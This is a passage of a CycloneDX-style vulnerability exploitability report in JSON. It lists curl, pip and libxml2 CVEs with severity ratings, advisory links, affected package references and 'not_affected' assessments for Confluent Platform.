          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-6276",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        319
      ],
      "description": "Using libcurl, when a custom `Host:` header is first set for an HTTP request\nand a second request is subsequently done using the same *easy handle* but\nwithout the custom `Host:` header set, the second request would use stale\ninformation and pass on cookies meant for the first host in the second\nrequest. Leak them.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6276"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/29/13"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6276"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-6276.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-6276.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-2jc6-hc33-hv48"
        },
        {
          "url": "https://hackerone.com/reports/3671818"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6276"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8227-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6276"
        }
      ],
      "published": "2026-05-13T13:01:56+00:00",
      "updated": "2026-06-17T11:00:35+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-6357",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"
        }
      ],
      "cwes": [
        829
      ],
      "description": "pip prior to version 26.1 would run self-update check functionality after installing wheel files which required importing well-known Python modules names. These module imports were intentionally deferred to increase startup time of the pip CLI. The patch changes self-update functionality to run before wheels are installed to prevent newly-installed modules from being imported shortly after the installation of a wheel package. Users should still review package contents prior to installation.",
      "recommendation": "Upgrade pip to version 26.1",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6357"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/27/7"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6357"
        },
        {
          "url": "https://github.com/pypa/pip"
        },
        {
          "url": "https://github.com/pypa/pip/commit/b369bfc96cc524e00c267e1693290e6599c36bad"
        },
        {
          "url": "https://github.com/pypa/pip/pull/13923"
        },
        {
          "url": "https://ichard26.github.io/blog/2026/04/whats-new-in-pip-26.1/#security-fixes"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6357"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6357"
        }
      ],
      "published": "2026-04-27T15:16:20+00:00",
      "updated": "2026-06-17T11:00:42+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/pip@26.0.1",
          "versions": [
            {
              "version": "26.0.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:pypi/pip@26.0.1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-6429",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "description": "When asked to both use a `.netrc` file for credentials and to follow HTTP\nredirects, libcurl could leak the password used for the first host to the\nfollowed-to host under certain circumstances.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6429"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6429"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-6429.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-6429.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-2pvc-5qw9-h3ph"
        },
        {
          "url": "https://hackerone.com/reports/3677759"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6429"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8227-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6429"
        }
      ],
      "published": "2026-05-13T13:01:56+00:00",
      "updated": "2026-06-17T11:00:49+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-6653",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 9.8,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 9.8,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        416,
        611
      ],
      "description": "Use After Free in libxml2's xmlParseInternalSubset from GNOME libxml2 version 2.9.11 to 2.11.0 allows a remote attacker to cause a denial-of-service via maliciously crafted XML input with improper entity resolution handling.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6653"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6653"
        },
        {
          "url": "https://bugs.launchpad.net/ubuntu/+source/libxml2/+bug/2141260"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/work_items/1058"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6653"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8456-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6653"
        }
      ],
      "published": "2026-06-22T14:17:51+00:00",
      "updated": "2026-07-14T16:00:16+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.9.13-14.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-6732",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        843
      ],
      "description": "A flaw was found in libxml2. This vulnerability occurs when the library processes a specially crafted XML Schema Definition (XSD) validated document that includes an internal entity reference. An attacker could exploit this by providing a malicious document, leading to a type confusion error that causes the application to crash. This results in a denial of service (DoS), making the affected system or application unavailable.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6732"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:11503"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6732"
        },
        {
